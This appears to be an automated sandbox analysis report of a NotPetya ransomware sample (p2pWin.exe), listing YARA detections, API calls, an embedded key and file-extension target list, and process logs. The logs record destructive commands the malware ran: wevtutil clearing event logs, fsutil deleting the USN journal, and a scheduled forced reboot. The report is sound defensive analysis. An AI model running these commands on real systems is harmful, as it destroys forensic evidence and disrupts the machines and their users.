            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTR | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR | Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\dllcm.datJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB
            Source: C:\Users\user\Desktop\p2pWin.exeFile created: C:\Windows\dllcm.datJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E902244 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,4_2_00007FF72E902244
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E90195C NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,4_2_00007FF72E90195C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E58CBF: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification,1_2_02E58CBF
            Source: dllhost.dat.1.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
            Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: SecurityJump to behavior
            Source: p2pWin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@24/63@0/3
            Source: C:\Users\user\Desktop\p2pWin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E585D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_02E585D0
            Source: p2pWin.exeBinary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.exe.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
            Source: p2pWin.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\p2pWin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\p2pWin.exe C:\Users\user\Desktop\p2pWin.exe
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\F2CD.tmp "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\F2CD.tmp "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Users\user\Desktop\p2pWin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E581BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,1_2_02E581BA
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\F2CD.tmpJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E58677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_02E58677
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
            Source: C:\Users\user\Desktop\p2pWin.exeCommand line argument: rundll32.exe0_2_00031070
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: p2pWin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: p2pWin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb x source: dllhost.dat.1.dr
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb source: dllhost.dat.1.dr
            Source: Binary string: lsasrv.pdb source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lsasrv.pdbUGP source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
